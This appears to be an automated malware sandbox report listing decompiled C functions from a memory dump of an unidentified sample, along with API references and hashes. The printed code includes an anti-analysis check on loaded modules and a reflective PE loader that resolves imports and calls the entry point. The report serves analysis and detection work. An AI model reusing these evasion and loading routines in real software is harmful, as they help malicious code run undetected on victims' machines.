0x00e62ea7
0x00e62eaa
0x00e62eaa
0x00e62eae
0x00e62eb7
0x00e62ebe
0x00e62ec1
0x00e62ec6
0x00e62ecb
0x00e62ecb
0x00e62ece
0x00e62ed3
0x00000000
0x00000000
0x00e62df7
0x00e62df9
0x00e62e06
0x00000000
0x00000000
0x00e62e06
0x00e62df9
0x00000000
0x00e62df5
0x00e62ed9
0x00e62ede
0x00e62ee1
0x00e62ee4
0x00e62f8f
0x00e62f8f
0x00e62eea
0x00e62eea
0x00e62eea
0x00e62eef
0x00e62f19
0x00e62f1c
0x00e62f1c
0x00e62f21
0x00e62f23
0x00e62f25
0x00e62f28
0x00e62f2b
0x00e62f33
0x00e62f38
0x00e62f38
0x00e62f3e
0x00e62f41
0x00e62f44
0x00e62f47
0x00e62f49
0x00e62f49
0x00e62f4a
0x00e62f4a
0x00e62f47
0x00e62f58
0x00e62f5b
0x00e62f5f
0x00e62f64
0x00e62f67
0x00e62f6a
0x00e62f6a
0x00e62f6a
0x00e62f6d
0x00e62f6d
0x00e62f70
0x00e62f70
0x00e62ef1
0x00e62ef1
0x00e62f01
0x00e62f04
0x00e62f09
0x00e62f09
0x00e62f0c
0x00e62f0f
0x00e62f12
0x00e62f14
0x00e62f14
0x00e62f73
0x00e62f75
0x00e62f78
0x00e62f78
0x00e62f7e
0x00e62f82
0x00e62f85
0x00e62f87
0x00e62f87
0x00e62f98
0x00e62f9a
0x00e62f9a
0x00e62fa2
0x00e62fb0
0x00e62fb3
0x00e62fb5
0x00e62fd5
0x00e62fd5
0x00e62fd8
0x00e62fde
0x00e62fdf
0x00e62fe2
0x00e62fe4
0x00e62fe7
0x00e62fea
0x00e62fed
0x00e62ff1
0x00e62ff4
0x00e62ff7
0x00e62ffa
0x00e62ffc
0x00e62ffc
0x00e62fff
0x00e63001
0x00e63001
0x00e63004
0x00e63006
0x00e63009
0x00e63011
0x00e63014
0x00e63019
0x00e63019
0x00e6301f
0x00e63022
0x00e63025
0x00e63027
0x00e63027
0x00e63028
0x00e63028
0x00e63033
0x00e63033
0x00e63033
0x00e63036
0x00e63039
0x00e63039
0x00e6303c
0x00e6303c
0x00e62fff
0x00e6303f
0x00e63042
0x00e63045
0x00e63047
0x00e6304a
0x00e6304c
0x00e6304f
0x00e63052
0x00e63054
0x00e63057
0x00e6305f
0x00e63067
0x00e6306a
0x00e6306a
0x00e6306a
0x00e6306d
0x00e6306d
0x00e6306d
0x00e63070
0x00e63076
0x00e63078
0x00e63078
0x00e6307e
0x00e63084
0x00e6308d
0x00e63094
0x00e63096
0x00e63099
0x00e63099
0x00e6309c
0x00e6309c
0x00e6309f
0x00e630a1
0x00e630a4
0x00e630a6
0x00e630c1
0x00e630c1
0x00e630c5
0x00e630c8
0x00e630cb
0x00e630ce
0x00e630e4
0x00e630e4
0x00e630e4
0x00e630d0
0x00e630d0
0x00e630d2
0x00e630d6
0x00e630d9
0x00000000
0x00e630db
0x00e630db
0x00e630dd
0x00000000
0x00e630df
0x00e630df
0x00e630df
0x00e630dd
0x00e630d9
0x00e630e8
0x00e630eb
0x00e630f0
0x00e630fa
0x00e630fa
0x00e630fa
0x00e630fd
0x00e630a8
0x00e630a8
0x00e630aa
0x00e630b1
0x00e630b1
0x00e630b3
0x00e630b5
0x00e630b7
0x00e630bb
0x00e630bd
0x00e630bf
0x00000000
0x00000000
0x00e630bf
0x00e630bb
0x00e630ac
0x00e630ac
0x00e630af
0x00000000
0x00000000
0x00e630af
0x00e630aa
0x00e63107
0x00e63109
0x00e63109
0x00e63114
0x00e62fb7
0x00e62fb7
0x00e62fba
0x00000000
0x00e62fbc
0x00e62fbc
0x00e62fbe
0x00e62fc2
0x00000000
0x00e62fc4
0x00e62fc4
0x00e62fc4
0x00e62fc7
0x00000000
0x00e62fcb
0x00e62fd4
0x00e62fd4
0x00e62fc7
0x00e62fc2
0x00e62fba
0x00e62fa6
0x00e62faf
0x00e62faf

APIs

memcpy.MSVCRT ref: 00E62E8D
memcpy.MSVCRT ref: 00E62F04
memcpy.MSVCRT ref: 00E62F33
memcpy.MSVCRT ref: 00E62F5F
memcpy.MSVCRT ref: 00E63014

Part of subcall function 00E65DA0: memcpy.MSVCRT ref: 00E65E7E

Part of subcall function 00E64B00: memcpy.MSVCRT ref: 00E64B2A

Memory Dump Source

Source File: 00000005.00000002.702624880.0000000000E50000.00000040.00020000.sdmp, Offset: 00E50000, based on PE: true

Similarity

API ID: memcpy
String ID:
API String ID: 3510742995-0
Opcode ID: 6b99f785ef5bb432ba68396c877eb0d4086885f26b78ddb0bfc44904db9e768b
Instruction ID: 852423cefdac450bf7da0dc0ac94eb2cb18dfdf735c26509c21802526eed1e74
Opcode Fuzzy Hash: 6b99f785ef5bb432ba68396c877eb0d4086885f26b78ddb0bfc44904db9e768b
Instruction Fuzzy Hash: 40D11471640A009FCB24CF69E8D096ABBF1FF98388B24992DE98AD7741D771E944CB50

Uniqueness

Uniqueness Score: -1.00%

Function 00E54D6E, Relevance: 6.4, APIs: 4, Instructions: 424
stringCOMMON

Download Yara Rule

C-Code - Quality: 70%

			E00E54D6E(intOrPtr* __ecx, void* __edx, void* __fp0) {
				char _v516;
				char _v556;
				char _v564;
				char _v568;
				char _v572;
				char _v576;
				intOrPtr _v580;
				char _v588;
				signed int _v596;
				intOrPtr _v602;
				intOrPtr _v604;
				char _v608;
				CHAR* _v612;
				CHAR* _v616;
				signed int _v620;
				signed int _v624;
				signed int _v628;
				signed int _v632;
				char _v636;
				intOrPtr _t117;
				signed int _t120;
				CHAR* _t122;
				intOrPtr _t123;
				CHAR* _t125;
				WCHAR* _t128;
				intOrPtr _t131;
				intOrPtr _t135;
				WCHAR* _t136;
				intOrPtr _t140;
				WCHAR* _t141;
				CHAR* _t142;
				intOrPtr _t143;
				intOrPtr _t148;
				intOrPtr _t151;
				WCHAR* _t152;
				signed int _t157;
				WCHAR* _t158;
				intOrPtr _t161;
				intOrPtr _t163;
				intOrPtr _t164;
				intOrPtr _t168;
				signed int _t171;
				signed int _t176;
				WCHAR* _t180;
				char _t181;
				intOrPtr _t195;
				intOrPtr _t206;
				signed int _t210;
				char _t215;
				WCHAR* _t226;
				intOrPtr _t230;
				intOrPtr _t233;
				WCHAR* _t234;
				signed int _t235;
				signed int _t242;
				signed int _t244;
				signed int _t245;
				CHAR* _t246;
				intOrPtr _t258;
				intOrPtr _t266;
				void* _t267;
				void* _t269;
				intOrPtr _t270;
				void* _t276;
				intOrPtr _t278;
				void* _t295;
				void* _t296;
				intOrPtr _t302;
				WCHAR* _t322;
				CHAR* _t323;
				void* _t325;
				WCHAR* _t326;
				intOrPtr _t328;
				WCHAR* _t330;
				signed int _t333;
				intOrPtr* _t335;
				void* _t354;

				_t354 = __fp0;
				_t335 = (_t333 & 0xfffffff8) - 0x26c;
				_t117 =  *0xe6e688; // 0xe80000
				_t242 = 0;
				_t325 = __ecx;
				_v620 = 0;
				if(( *(_t117 + 0x1898) & 0x00000082) == 0) {
					L8:
					_t13 = E00E5B78E(0xe6b9c0,  &_v516) + 1; // 0x1
					E00E5A853( &_v556, _t13, 0);
					_t295 = 0x64;
					_t120 = E00E5A457( &_v556, _t295);
					 *0xe6e748 = _t120;
					if(_t120 != 0) {
						_push(0x4e5);
						_t296 = 0x10;
						 *0xe6e680 = E00E5E1C7(0xe6b9c4, _t296);
						 *_t335 = 0x610;
						_t122 = E00E595C7(0xe6b9c4);
						_push(_t242);
						_push(_t122);
						_v612 = _t122;
						_t123 =  *0xe6e688; // 0xe80000
						_t125 = E00E592CB(_t123 + 0x228);
						_t315 = _t125;
						_v616 = _t125;
						E00E585BB( &_v612);
						_t128 = E00E5B24F(_t125);
						__eflags = _t128;
						if(_t128 != 0) {
							_t234 = E00E58955(_t315, 1, _t242, _t242);
							__eflags = _t234;
							if(_t234 != 0) {
								_t235 = E00E5A2C9(_t234);
							} else {
								_t235 = _t242;
							}
							 *((intOrPtr*)(_t325 + 0x10)) = _t235;
							 *_t325 = 3;
						}
						E00E58600( &_v616, 0xfffffffe);
						_t131 =  *0xe6e688; // 0xe80000
						_t21 = _t131 + 0x114; // 0xe80114
						E00E54A0C( *((intOrPtr*)( *((intOrPtr*)(_t131 + 0x110)))), _t21, _t354, _t325, _t242, _t242);
						_t258 =  *0xe6e688; // 0xe80000
						__eflags =  *((intOrPtr*)(_t258 + 0x101c)) - 3;
						if( *((intOrPtr*)(_t258 + 0x101c)) == 3) {
							L19:
							asm("stosd");
							asm("stosd");
							asm("stosd");
							asm("stosd");
							asm("stosd");
							_v572 = _t325;
							_v576 =  *((intOrPtr*)(_t258 + 0x214));
							_t135 =  *0xe6e680; // 0x0
							_t136 =  *(_t135 + 8);
							__eflags = _t136;
							if(_t136 != 0) {
								 *_t136(_t242, _t242, 1,  &_v568,  &_v564);
							}
							_v620 = _t242;
							E00E5E2D1(_t354,  &_v576);
							_pop(_t258);
							_t140 =  *0xe6e6b4; // 0x510f870
							_t141 =  *((intOrPtr*)(_t140 + 0x10))(_t242, _t242,  &_v620);
							__eflags = _t141;
							if(_t141 == 0) {
								E00E5E2D1(_t354,  &_v588);
								_t230 =  *0xe6e6b4; // 0x510f870
								_pop(_t258);
								 *((intOrPtr*)(_t230 + 0xc))(_v632);
							}
							__eflags =  *0xe6e73c;
							if( *0xe6e73c <= 0) {
								goto L37;
							} else {
								_t163 =  *0xe6e680; // 0x0
								__eflags =  *((intOrPtr*)(_t163 + 8)) - _t242;
								if( *((intOrPtr*)(_t163 + 8)) != _t242) {
									_t226 =  *(_t163 + 0xc);
									__eflags = _t226;
									if(_t226 != 0) {
										 *_t226(_v580);
									}
								}
								_t164 =  *0xe6e688; // 0xe80000
								_t258 =  *((intOrPtr*)(_t164 + 0x214));
								__eflags = _t258 - 3;
								if(_t258 == 3) {
									goto L37;
								} else {
									__eflags =  *((intOrPtr*)(_t164 + 4)) - 6;
									if( *((intOrPtr*)(_t164 + 4)) >= 6) {
										__eflags =  *((intOrPtr*)(_t164 + 0x101c)) - 3;
										if( *((intOrPtr*)(_t164 + 0x101c)) != 3) {
											goto L37;
										}
										E00E549A6();
										asm("stosd");
										asm("stosd");
										asm("stosd");
										asm("stosd");
										_t168 =  *0xe6e684; // 0x510f6c8
										 *((intOrPtr*)(_t168 + 0xd8))( &_v608);
										_t266 = _v602;
										_t244 = 0x3c;
										_t171 = _t266 + 0x00000002 & 0x0000ffff;
										_v596 = _t171;
										_v620 = _t171 / _t244 + _v604 & 0x0000ffff;
										_t176 = _t266 + 0x0000000e & 0x0000ffff;
										_v624 = _t176;
										_v628 = _t176 / _t244 + _v604 & 0x0000ffff;
										_t180 = E00E585EA(0x1000);
										_v632 = _t180;
										_pop(_t267);
										__eflags = _t180;
										if(_t180 != 0) {
											_t181 = E00E5109A(_t267, 0x148);
											_t302 =  *0xe6e688; // 0xe80000
											_v636 = _t181;
											_push(_t302 + 0x648);
											_push(0xa);
											_push(7);
											_t269 = 2;
											E00E59013(_t269,  &_v572);
											_t270 =  *0xe6e688; // 0xe80000
											_t330 = E00E560C5( &_v572, _t270 + 0x228, 1,  *((intOrPtr*)(_t270 + 0xa0)));
											_v616 = _t330;
											__eflags = _t330;
											if(_t330 != 0) {
												_push(_v624 % _t244 & 0x0000ffff);
												_push(_v628 & 0x0000ffff);
												_push(_v596 % _t244 & 0x0000ffff);
												_push(_v620 & 0x0000ffff);
												_push(_t330);
												_push( &_v572);
												_t195 =  *0xe6e688; // 0xe80000
												__eflags = _t195 + 0x1020;
												E00E59626(_v632, 0x1000, _v636, _t195 + 0x1020);
												E00E585BB( &_v636);
												E00E5A8F7(_v632, 0, 0xbb8, 1);
												E00E58600( &_v616, 0xfffffffe);
											}
											E00E58600( &_v632, 0xfffffffe);
										}
										goto L42;
									}
									__eflags = _t258 - 2;
									if(_t258 != 2) {
										goto L37;
									}
									E00E549A6();
									asm("stosd");
									asm("stosd");
									asm("stosd");
									asm("stosd");
									_t206 =  *0xe6e684; // 0x510f6c8
									 *((intOrPtr*)(_t206 + 0xd8))( &_v608);
									_t210 = _v602 + 0x00000002 & 0x0000ffff;
									_v628 = _t210;
									_t245 = 0x3c;
									_v632 = _t210 / _t245 + _v604 & 0x0000ffff;
									_t322 = E00E585EA(0x1000);
									_v624 = _t322;
									_pop(_t276);
									__eflags = _t322;
									if(_t322 != 0) {
										_t215 = E00E595C7(_t276, 0x32d);
										_t278 =  *0xe6e688; // 0xe80000
										_push(_t278 + 0x228);
										_push(_v628 % _t245 & 0x0000ffff);
										_v636 = _t215;
										E00E59626(_t322, 0x1000, _t215, _v632 & 0x0000ffff);
										E00E585BB( &_v636);
										E00E5A8F7(_t322, 0, 0xbb8, 1);
										E00E58600( &_v624, 0xfffffffe);
									}
									goto L42;
								}
							}
						} else {
							_t233 =  *((intOrPtr*)(_t258 + 0x214));
							__eflags = _t233 - 3;
							if(_t233 == 3) {
								goto L19;
							}
							__eflags =  *((intOrPtr*)(_t258 + 4)) - 6;
							if( *((intOrPtr*)(_t258 + 4)) >= 6) {
								L37:
								_t142 = E00E595C7(_t258, 0x610);
								_push(_t242);
								_push(_t142);
								_v616 = _t142;
								_t143 =  *0xe6e688; // 0xe80000
								_t326 = E00E592CB(_t143 + 0x228);
								_v612 = _t326;
								__eflags = _t326;
								if(_t326 != 0) {
									_t158 = E00E5B24F(_t326);
									__eflags = _t158;
									if(_t158 != 0) {
										_t161 =  *0xe6e684; // 0x510f6c8
										 *((intOrPtr*)(_t161 + 0x10c))(_t326);
									}
									E00E58600( &_v612, 0xfffffffe);
								}
								E00E585BB( &_v616);
								_t148 =  *0xe6e688; // 0xe80000
								lstrcpynW(_t148 + 0x438,  *0xe6e740, 0x20a);
								_t151 =  *0xe6e688; // 0xe80000
								_t152 = _t151 + 0x228;
								__eflags = _t152;
								lstrcpynW(_t152,  *0xe6e738, 0x20a);
								_t328 =  *0xe6e688; // 0xe80000
								_t115 = _t328 + 0x228; // 0xe80228
								 *((intOrPtr*)(_t328 + 0x434)) = E00E58FA4(_t115, __eflags);
								E00E58600(0xe6e740, 0xfffffffe);
								E00E58600(0xe6e738, 0xfffffffe);
								L42:
								_t157 = 0;
								__eflags = 0;
								L43:
								return _t157;
							}
							__eflags = _t233 - 2;
							if(_t233 != 2) {
								goto L37;
							}
							goto L19;
						}
					}
					L9:
					_t157 = _t120 | 0xffffffff;
					goto L43;
				}
				_t246 = E00E595AD(0x6e2);
				_v616 = _t246;
				_t323 = E00E595AD(0x9f5);
				_v612 = _t323;
				if(_t246 == 0 || _t323 == 0) {
					L7:
					_t242 = 0;
					goto L8;
				} else {
					if(GetModuleHandleA(_t246) != 0 || GetModuleHandleA(_t323) != 0) {
						_v620 = 1;
					}
					E00E585A8( &_v616);
					_t120 = E00E585A8( &_v612);
					if(_v620 != 0) {
						goto L9;
					}
					goto L7;
				}
			}

0x00e54d6e
0x00e54d74
0x00e54d7a
0x00e54d81
0x00e54d83
0x00e54d8d
0x00e54d91
0x00e54df2
0x00e54e04
0x00e54e07
0x00e54e0e
0x00e54e13
0x00e54e18
0x00e54e1f
0x00e54e29
0x00e54e30
0x00e54e3b
0x00e54e40
0x00e54e47
0x00e54e4d
0x00e54e4e
0x00e54e4f
0x00e54e53
0x00e54e5e
0x00e54e66
0x00e54e6c
0x00e54e71
0x00e54e79
0x00e54e7e
0x00e54e80
0x00e54e88
0x00e54e8f
0x00e54e91
0x00e54e99
0x00e54e93
0x00e54e93
0x00e54e93
0x00e54e9e
0x00e54ea1
0x00e54ea1
0x00e54eae
0x00e54eb3
0x00e54ec1
0x00e54ec9
0x00e54ece
0x00e54ed7
0x00e54ede
0x00e54efe
0x00e54f04
0x00e54f05
0x00e54f06
0x00e54f07
0x00e54f08
0x00e54f09
0x00e54f13
0x00e54f17
0x00e54f1c
0x00e54f1f
0x00e54f21
0x00e54f31
0x00e54f31
0x00e54f37
0x00e54f3e
0x00e54f43
0x00e54f49
0x00e54f50
0x00e54f53
0x00e54f55
0x00e54f60
0x00e54f65
0x00e54f6a
0x00e54f6f
0x00e54f6f
0x00e54f72
0x00e54f79
0x00000000
0x00e54f7f
0x00e54f7f
0x00e54f84
0x00e54f87
0x00e54f89
0x00e54f8c
0x00e54f8e
0x00e54f94
0x00e54f94
0x00e54f8e
0x00e54f96
0x00e54f9b
0x00e54fa1
0x00e54fa4
0x00000000
0x00e54faa
0x00e54faa
0x00e54fae
0x00e55083
0x00e5508a
0x00000000
0x00000000
0x00e55090
0x00e5509b
0x00e5509c
0x00e5509d
0x00e5509e
0x00e550a4
0x00e550a9
0x00e550af
0x00e550b7
0x00e550c0
0x00e550c3
0x00e550d2
0x00e550d9
0x00e550dc
0x00e550ea
0x00e550ee
0x00e550f3
0x00e550f7
0x00e550f8
0x00e550fa
0x00e55105
0x00e5510a
0x00e55117
0x00e5511b
0x00e5511c
0x00e5511e
0x00e55126
0x00e55127
0x00e5512c
0x00e55149
0x00e5514e
0x00e55152
0x00e55154
0x00e55167
0x00e55171
0x00e55175
0x00e5517d
0x00e5517e
0x00e55187
0x00e55188
0x00e5518d
0x00e55199
0x00e551a3
0x00e551b5
0x00e551c1
0x00e551c6
0x00e551d0
0x00e551d6
0x00000000
0x00e550fa
0x00e54fb4
0x00e54fb7
0x00000000
0x00000000
0x00e54fbd
0x00e54fc8
0x00e54fc9
0x00e54fca
0x00e54fcb
0x00e54fd1
0x00e54fd6
0x00e54fe5
0x00e54fea
0x00e54fee
0x00e54ffd
0x00e55006
0x00e55008
0x00e5500c
0x00e5500d
0x00e5500f
0x00e5501a
0x00e5502e
0x00e5503d
0x00e55041
0x00e5504a
0x00e5504e
0x00e55058
0x00e5506a
0x00e55076
0x00e5507b
0x00000000
0x00e5500f
0x00e54fa4
0x00e54ee0
0x00e54ee0
0x00e54ee6
0x00e54ee9
0x00000000
0x00000000
0x00e54eeb
0x00e54eef
0x00e551dc
0x00e551e1
0x00e551e7
0x00e551e8
0x00e551e9
0x00e551ed
0x00e551fd
0x00e55202
0x00e55206
0x00e55208
0x00e5520c
0x00e55211
0x00e55213
0x00e55215
0x00e5521b
0x00e5521b
0x00e55228
0x00e5522e
0x00e55234
0x00e55239
0x00e55257
0x00e55259
0x00e55265
0x00e55265
0x00e5526b
0x00e5526d
0x00e55273
0x00e55285
0x00e5528b
0x00e55297
0x00e5529f
0x00e5529f
0x00e5529f
0x00e552a1
0x00e552a7
0x00e552a7
0x00e54ef5
0x00e54ef8
0x00000000
0x00000000
0x00000000
0x00e54ef8
0x00e54ede
0x00e54e21
0x00e54e21
0x00000000
0x00e54e21
0x00e54d9d
0x00e54da4
0x00e54dad
0x00e54daf
0x00e54db5
0x00e54df0
0x00e54df0
0x00000000
0x00e54dbb
0x00e54dc6
0x00e54dcf
0x00e54dcf
0x00e54ddb
0x00e54de4
0x00e54dee
0x00000000
0x00000000
0x00000000
0x00e54dee

APIs

GetModuleHandleA.KERNEL32(00000000,00000000), ref: 00E54DC2
GetModuleHandleA.KERNEL32(00000000), ref: 00E54DC9
lstrcpynW.KERNEL32(00E7FBC8,0000020A,?,?,?,?,?,?,?,?,?,00000000), ref: 00E55257
lstrcpynW.KERNEL32(00E7FDD8,0000020A,?,?,?,?,?,?,?,?,?,00000000), ref: 00E5526B

Memory Dump Source

Source File: 00000005.00000002.702624880.0000000000E50000.00000040.00020000.sdmp, Offset: 00E50000, based on PE: true

Similarity

API ID: HandleModulelstrcpyn
String ID:
API String ID: 3430401031-0
Opcode ID: e1b103a88b5c02150c3b960c072e6570931cd6fba9a26890a230ad0eb222a2c7
Instruction ID: 98385383d9174753e1cffbf0e69195cf030e0c02231af3a7d927b1f3c847766d
Opcode Fuzzy Hash: e1b103a88b5c02150c3b960c072e6570931cd6fba9a26890a230ad0eb222a2c7
Instruction Fuzzy Hash: 88E1D171504301AFE300EF65DC85AAB73E9AB98359F041D29F944F72E1EBB0D9498B62

Uniqueness

Uniqueness Score: -1.00%

Function 00E62AF7, Relevance: 6.2, APIs: 4, Instructions: 219
libraryloaderCOMMON

Download Yara Rule

C-Code - Quality: 52%

			E00E62AF7(intOrPtr _a4, intOrPtr _a8, intOrPtr* _a12) {
				signed int _v5;
				signed short _v12;
				intOrPtr* _v16;
				signed int* _v20;
				intOrPtr _v24;
				unsigned int _v28;
				signed short* _v32;
				struct HINSTANCE__* _v36;
				intOrPtr* _v40;
				signed short* _v44;
				intOrPtr _v48;
				unsigned int _v52;
				intOrPtr _v56;
				_Unknown_base(*)()* _v60;
				signed int _v64;
				intOrPtr _v68;
				intOrPtr _v72;
				unsigned int _v76;
				intOrPtr _v80;
				signed int _v84;
				intOrPtr _v88;
				signed int _t149;
				void* _t189;
				signed int _t194;
				signed int _t196;
				intOrPtr _t236;

				_v72 =  *((intOrPtr*)(_a4 + 0x3c)) + _a4;
				_v24 = _v72;
				_t236 = _a4 -  *((intOrPtr*)(_v24 + 0x34));
				_v56 = _t236;
				if(_t236 == 0) {
					L13:
					while(0 != 0) {
					}
					_push(8);
					if( *((intOrPtr*)(_v24 + 0xbadc25)) == 0) {
						L35:
						_v68 =  *((intOrPtr*)(_v24 + 0x28)) + _a4;
						while(0 != 0) {
						}
						if(_a12 != 0) {
							 *_a12 = _v68;
						}
						 *((intOrPtr*)(_v24 + 0x34)) = _a4;
						return _v68(_a4, 1, _a8);
					}
					_v84 = 0x80000000;
					_t149 = 8;
					_v16 = _a4 +  *((intOrPtr*)(_v24 + (_t149 << 0) + 0x78));
					while( *((intOrPtr*)(_v16 + 0xc)) != 0) {
						_v36 = GetModuleHandleA( *((intOrPtr*)(_v16 + 0xc)) + _a4);
						if(_v36 == 0) {
							_v36 = LoadLibraryA( *((intOrPtr*)(_v16 + 0xc)) + _a4);
						}
						if(_v36 != 0) {
							if( *_v16 == 0) {
								_v20 =  *((intOrPtr*)(_v16 + 0x10)) + _a4;
							} else {
								_v20 =  *_v16 + _a4;
							}
							_v64 = _v64 & 0x00000000;
							while( *_v20 != 0) {
								if(( *_v20 & _v84) == 0) {
									_v88 =  *_v20 + _a4;
									_v60 = GetProcAddress(_v36, _v88 + 2);
								} else {
									_v60 = GetProcAddress(_v36,  *_v20 & 0x0000ffff);
								}
								if( *((intOrPtr*)(_v16 + 0x10)) == 0) {
									 *_v20 = _v60;
								} else {
									 *( *((intOrPtr*)(_v16 + 0x10)) + _a4 + _v64) = _v60;
								}
								_v20 =  &(_v20[1]);
								_v64 = _v64 + 4;
							}
							_v16 = _v16 + 0x14;
							continue;
						} else {
							_t189 = 0xfffffffd;
							return _t189;
						}
					}
					goto L35;
				}
				_t194 = 8;
				_v44 = _a4 +  *((intOrPtr*)(_v24 + 0x78 + _t194 * 5));
				_t196 = 8;
				_v48 =  *((intOrPtr*)(_v24 + 0x7c + _t196 * 5));
				while(0 != 0) {
				}
				while(_v48 > 0) {
					_v28 = _v44[2];
					_v48 = _v48 - _v28;
					_v28 = _v28 - 8;
					_v28 = _v28 >> 1;
					_v32 =  &(_v44[4]);
					_v80 = _a4 +  *_v44;
					_v52 = _v28;
					while(1) {
						_v76 = _v52;
						_v52 = _v52 - 1;
						if(_v76 == 0) {
							break;
						}
						_v5 = ( *_v32 & 0x0000ffff) >> 0xc;
						_v12 =  *_v32 & 0xfff;
						_v40 = (_v12 & 0x0000ffff) + _v80;
						if((_v5 & 0x000000ff) != 3) {
							if((_v5 & 0x000000ff) == 0xa) {
								 *_v40 =  *_v40 + _v56;
							}
						} else {
							 *_v40 =  *_v40 + _v56;
						}
						_v32 =  &(_v32[1]);
					}
					_v44 = _v32;
				}
				goto L13;
			}

0x00e62b06
0x00e62b0c
0x00e62b15
0x00e62b18
0x00e62b1b
0x00000000
0x00e62c0c
0x00e62c10
0x00e62c12
0x00e62c20
0x00e62d3e
0x00e62d47
0x00e62d4a
0x00e62d4e
0x00e62d54
0x00e62d5c
0x00e62d5c
0x00e62d64
0x00000000
0x00e62d6f
0x00e62c26
0x00e62c2f
0x00e62c3d
0x00e62c40
0x00e62c5d
0x00e62c64
0x00e62c76
0x00e62c76
0x00e62c7d
0x00e62c8d
0x00e62ca5
0x00e62c8f
0x00e62c97
0x00e62c97
0x00e62ca8
0x00e62cac
0x00e62cbc
0x00e62cdf
0x00e62cf1
0x00e62cbe
0x00e62cd2
0x00e62cd2
0x00e62cfb
0x00e62d17
0x00e62cfd
0x00e62d0c
0x00e62d0c
0x00e62d1f
0x00e62d28
0x00e62d28
0x00e62d36
0x00000000
0x00e62c7f
0x00e62c81
0x00000000
0x00e62c81
0x00e62c7d
0x00000000
0x00e62c40
0x00e62b23
0x00e62b31
0x00e62b36
0x00e62b41
0x00e62b44
0x00e62b48
0x00e62b4a
0x00e62b5a
0x00e62b63
0x00e62b6c
0x00e62b74
0x00e62b7d
0x00e62b88
0x00e62b8e
0x00e62b91
0x00e62b94
0x00e62b9b
0x00e62ba2
0x00000000
0x00000000
0x00e62bad
0x00e62bbb
0x00e62bc6
0x00e62bd0
0x00e62be8
0x00e62bf5
0x00e62bf5
0x00e62bd2
0x00e62bdd
0x00e62bdd
0x00e62bfc
0x00e62bfc
0x00e62c04
0x00e62c04
0x00000000

APIs

GetModuleHandleA.KERNEL32(?), ref: 00E62C57
LoadLibraryA.KERNEL32(?), ref: 00E62C70
GetProcAddress.KERNEL32(00000000,890CC483), ref: 00E62CCC
GetProcAddress.KERNEL32(00000000,?), ref: 00E62CEB

Memory Dump Source

Source File: 00000005.00000002.702624880.0000000000E50000.00000040.00020000.sdmp, Offset: 00E50000, based on PE: true

Similarity

API ID: AddressProc$HandleLibraryLoadModule
String ID:
API String ID: 384173800-0
Opcode ID: 635f6114dc9bdecd5eb63fe3714de1019e18df0298e96c88539751b833f71931
Instruction ID: ce534796deb8cf1ca3da8778add680974069e0a34298ef78704e8e650b38d46e
Opcode Fuzzy Hash: 635f6114dc9bdecd5eb63fe3714de1019e18df0298e96c88539751b833f71931
Instruction Fuzzy Hash: 51A19B75A40209DFCB14CFA8D884AADBBF0FF08358F149559E915BB3A1D734AA81CF64

Uniqueness

Uniqueness Score: -1.00%

Function 00E51C68, Relevance: 6.1, APIs: 4, Instructions: 106
COMMON

Download Yara Rule

C-Code - Quality: 75%

			E00E51C68(signed int __ecx, void* __eflags, void* __fp0) {
				char _v16;
				intOrPtr _v20;
				char _v24;
				char _v28;
				void* _t13;
				intOrPtr _t15;
				signed int _t16;
				intOrPtr _t17;
				signed int _t18;
				char _t20;
				intOrPtr _t22;
				void* _t23;
				void* _t24;
				intOrPtr _t29;
				intOrPtr _t35;
				intOrPtr _t41;
				intOrPtr _t43;
				intOrPtr _t48;
				void* _t51;
				signed int _t61;
				signed int _t64;
				void* _t71;

				_t71 = __fp0;
				_t61 = __ecx;
				_t41 =  *0xe6e6dc; // 0x0
				_t13 = E00E5A4A5(_t41, 0);
				while(_t13 < 0) {
					E00E597F2( &_v28);
					_t43 =  *0xe6e6e0; // 0x0
					_t15 =  *0xe6e6e4; // 0x0
					_t41 = _t43 + 0xe10;
					asm("adc eax, ebx");
					__eflags = _t15 - _v24;
					if(__eflags > 0) {
						L9:
						_t16 = 0xfffffffe;
						L13:
						return _t16;
					}
					if(__eflags < 0) {
						L4:
						_t17 =  *0xe6e684; // 0x510f6c8
						_t18 =  *((intOrPtr*)(_t17 + 0xc8))( *0xe6e6d0, 0);
						__eflags = _t18;
						if(_t18 == 0) {
							break;
						}
						_t35 =  *0xe6e684; // 0x510f6c8
						 *((intOrPtr*)(_t35 + 0xb4))(0x3e8);
						_t41 =  *0xe6e6dc; // 0x0
						__eflags = 0;
						_t13 = E00E5A4A5(_t41, 0);
						continue;
					}
					__eflags = _t41 - _v28;
					if(_t41 >= _v28) {
						goto L9;
					}
					goto L4;
				}
				asm("stosd");
				asm("stosd");
				asm("stosd");
				asm("stosd");
				_t20 =  *0xe6e6e8; // 0x0
				_v28 = _t20;
				_t22 = E00E5A68F(_t41, _t61,  &_v16);
				_v20 = _t22;
				if(_t22 != 0) {
					_t23 = GetCurrentProcess();
					_t24 = GetCurrentThread();
					DuplicateHandle(GetCurrentProcess(), _t24, _t23, 0xe6e6d0, 0, 0, 2);
					E00E597F2(0xe6e6e0);
					_t64 = E00E51A1B( &_v28, E00E51226, _t71);
					__eflags = _t64;
					if(_t64 >= 0) {
						_push(0);
						_push( *0xe6e760);
						_t51 = 0x27;
						E00E59EEC(_t51);
					}
				} else {
					_t64 = _t61 | 0xffffffff;
				}
				_t29 =  *0xe6e684; // 0x510f6c8
				 *((intOrPtr*)(_t29 + 0x30))( *0xe6e6d0);
				_t48 =  *0xe6e6dc; // 0x0
				 *0xe6e6d0 = 0;
				E00E5A4C1(_t48);
				E00E58600( &_v24, 0);
				_t16 = _t64;
				goto L13;
			}

0x00e51c68
0x00e51c75
0x00e51c77
0x00e51c7e
0x00e51ce4
0x00e51c8b
0x00e51c90
0x00e51c96
0x00e51c9b
0x00e51ca1
0x00e51ca3
0x00e51ca7
0x00e51d15
0x00e51d17
0x00e51d99
0x00e51d9f
0x00e51d9f
0x00e51ca9
0x00e51cb1
0x00e51cb1
0x00e51cbd
0x00e51cc3
0x00e51cc5
0x00000000
0x00000000
0x00e51cc7
0x00e51cd1
0x00e51cd7
0x00e51cdd
0x00e51cdf
0x00000000
0x00e51cdf
0x00e51cab
0x00e51caf
0x00000000
0x00000000
0x00000000
0x00e51caf
0x00e51cee
0x00e51cef
0x00e51cf0
0x00e51cf1
0x00e51cf2
0x00e51cf7
0x00e51d01
0x00e51d06
0x00e51d0e
0x00e51d29
0x00e51d2c
0x00e51d36
0x00e51d41
0x00e51d54
0x00e51d56
0x00e51d58
0x00e51d5a
0x00e51d5b
0x00e51d63
0x00e51d64
0x00e51d6a
0x00e51d10
0x00e51d10
0x00e51d10
0x00e51d6b
